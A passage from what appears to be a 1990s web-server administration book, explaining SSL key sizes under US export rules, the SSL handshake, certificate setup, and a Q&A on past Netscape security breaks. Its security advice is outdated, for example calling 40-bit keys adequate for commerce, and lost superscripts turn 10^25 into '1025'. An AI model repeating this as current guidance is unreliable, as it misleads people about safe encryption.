Why have two different key sizes? The answer lies in politics, not in cryptography. United States export laws prevent companies from distributing encryption software with keys larger than 40-bit outside the United States. So companies such as Netscape create two versions of their software: one with 40-bit keys for international use, and one with 128-bit keys for United States-only use. Which software you have-the 128- or 40-bit version-depends on where you got it. Anything you download off the Net will be the 40-bit version. If you want the really secure versions, you'll have to buy the shrink-wrapped copies inside the United States.

Why the restrictions on key sizes and exporting software with encryption in it? The United States puts these restrictions on cryptography so that it can break codes generated by foreign terrorists or other undesirable organizations. Cryptographically speaking, 128-bit keys are about as secure as you can get. Assuming you could test 1 million keys per second using a supercomputer, it would take you 1025 years to break the code encrypted with the 128-bit number (the universe is only 1010 years old, for comparison). 40-bit keys, on the other hand, would take only about 13 days.

An unfortunate side effect of this restriction is that 40-bit session keys are also reasonably easy to break by organizations that are not governments. Cryptography experts agree, therefore, that 40-bit software is "crippled" and useless for real security purposes. In reality, the 40-bit keys are probably secure enough for most simple Internet transactions such as credit card numbers.

How SSL Connections Are Made

Got all that? Now that you understand public key encryption, digital signatures, and session keys, we can finally reveal how SSL connections are made (for those of you who have not yet fallen asleep).

For a secure SSL connection, you'll need both a browser and a server that support SSL. SSL connections use special URLs (they start with https rather than just http), and the browser connects to the server using a different port from the standard HTTPD. Here's what happens when a browser requests a secure connection from a server:

The browser connects to the server via HTTPS. The server sends back its digital certificate.
The browser verifies the digital certificate the server sent you is valid and signed by a trustworthy CA. If the certificate is not trustworthily signed, or something else is amiss, the browser may reject the connection outright or may ask the reader if he wants to proceed with the current connection (Netscape 2.0 is the only browser that will currently try to go ahead).
The browser generates a master key based on a random number, encrypts it using the server's public key, and sends it to the server.
The server decrypts the master key using its private key. Both browser and server now have the master key.
Both browser and server generate a session key based on the master key and random numbers exchanged earlier in the connection. Now both browser and server have identical session keys.
Data between the browser and server is encrypted using that session key. As long as a third party cannot guess that session key, the data stream cannot be decrypted into anything useful.

Setting Up SSL in Your Server

To use secure transactions on your server, you'll need a Web server that supports SSL. Many commercial servers in the United States provide SSL support, including Netscape's servers (all except the Communications Server), O'Reilly's WebSite, and StarNine's WebStar (the latter two may have SSL as a professional option to the standard server package). Additionally, the public domain server Apache has a version called ApacheSSL, which has support for SSL as well (although you'll have to get a cryptography package called RSARef in order to run it, and RSARef is neither public domain nor free for most uses).

Note

All this applies only to servers sold inside the United States. Because of United States export controls on cryptography, commercial organizations cannot sell products with encryption outside the United States unless that encryption has been crippled.

Each SSL server should provide a mechanism for generating the appropriate keys (a "certificate request") and for getting those keys signed by a certificate authority (usually Verisign; see http://www.verisign.com/ for details on digital signatures). Once you have a certificate signed and installed, that's all there is to it; now browsers will be able to connect to you and establish secure connections.

Some servers also provide a mechanism for allowing you to self-sign your certificates, that is, to provide SSL connections without a digital signature from a central CA. This will make your connection much less trustworthy, and at the moment Netscape 2.0 is the only browser that will accept self-signed certificates (and they only allow it after prompting the reader with a series of warnings in dialog boxes). For real secure connections and for Internet commerce, you'll definitely want to go the legitimate way and get your certificate signed by a verifiable CA.

More Information About SSL

Netscape, as the original developer of SSL, is a good place to start for information about SSL and network security. Their pages at http://www.netscape.com/info/security-doc.html have lots of information about SSL, Web security in general, as well as technical specifications for SSL itself.

Verisign is the United States' leading certificate authority, and the closest thing there is to a "top" of the CA hierarchy. To get a digital certificate, you'll usually have to go to Verisign. See http://www.verisign.com for more information.

For more information about Web security in general, you might want to check out the security page at the Word Wide Web Consortium at http://www.w3.org/hypertext/WWW/Security/Overview.html.

Summary

Security on the Internet is a growing concern, and as the administrator of a Web server, you should be concerned about it as well. Although the sorts of problems that can be caused by a Web server are minor compared to other Internet services, there are precautions you can take to prevent external and internal users from doing damage to your system or compromising the security you have already set up.

In this chapter, you learned about some of those precautions, including the following:

Various hints for tightening up the security on your server in general
How to avoid writing CGI scripts that have obvious security holes
Settting up access control and authenticated users for specific files and directories on your system
Using the NCSA options to control the features of your server on a per-directory basis

Q&A

Q	I put a `.htaccess` file in my home directory, but nothing I put in it seems to have any effect. What's going on here?
A	Your server administrator has probably set up a default configuration and then turned overrides off. Check with him or her to see what you can do in your own `.htaccess` file, if anything.
Q	I am limiting access to my directory using `<LIMIT>` and a `deny` command. But now whenever I try to access my files, I get a `500 Server Error` message. What did I do wrong?
A	Make sure that the first part of your `<LIMIT>` section is `<LIMIT GET>`. If you forget the `GET`, you'll get a server error. Note that most problems in access control and setup file errors will show up in the error log for your server. You can usually troubleshoot most problems with the NCSA server that way.
Q	I have this great idea in which I authenticate everyone reading my site, keep track of where they go, and then suggest other places for them to look based on their browsing patterns. Intelligent agents on the Web! Isn't this great?
A	Yup, you could use your authentication information as a method of watching for the browsing patterns of the readers of your site. However, be forewarned that there is a fine line there. Your readers might not want you to watch their reading patterns. They might not be interested in your suggestions. When in doubt, don't use information from your users unless they want you to. Some Web readers are very concerned about their privacy and how closely they are watched as they browse the Web. When in doubt, ask. Those who are interested in having an agent-like program suggest other sites for them will gleefully sign on, and those who don't want to be watched will ignore you. It'll give you less work to do. (You'll only have to keep track of the users who want the information.) And it will make you a better Web citizen.
Q	Awhile back there was a big news item about how some guy in France broke into Netscape's security in eight days. What happened there?
A	If you read the section on SSL, you'll remember that I said that given a million tests a second, 40-bit session keys can be theoretically broken in about 13 days. That was the version of Netscape that was broken-the version that is known to be crippled to deal with the United States export restrictions. The guy in France had access to several hundred computers, and he set them all to doing nothing but trying to break a single session key (it took him eight days). However, not every random hacker looking for credit card numbers is going to have access to several hundred computers for eight days, so for the most part, the 40-bit version is acceptable for basic Internet commerce. If you're worried about even that level of security, consider purchasing the software with the 128-bit keys (not even guys in France could easily break that version).
Q	There was another scandal about Netscape's security that had something to do with random numbers. What was that all about?
A	That was indeed a genuine flaw. If you read the section in this chapter about how the browser generates a master key, you'll note that it uses a random number as one of the things used to generate that key. The master key is then used to generate the session keys-both the 40- and 128-bit versions. The problem with Netscape's security was that the random number generator it used was not truly random, and, in fact, it was pretty easy to guess which random number was used to generate the master key. Once you know the master key, you can generate session keys that match the ones the browser and server are using to encrypt their data. Netscape, fortunately, fixed this problem in their software almost immediately.

Day 14

Chapter 28

Web Server Security and Access Control

CONTENTS

Public Key Encryption

Digital Certificates

Session Keys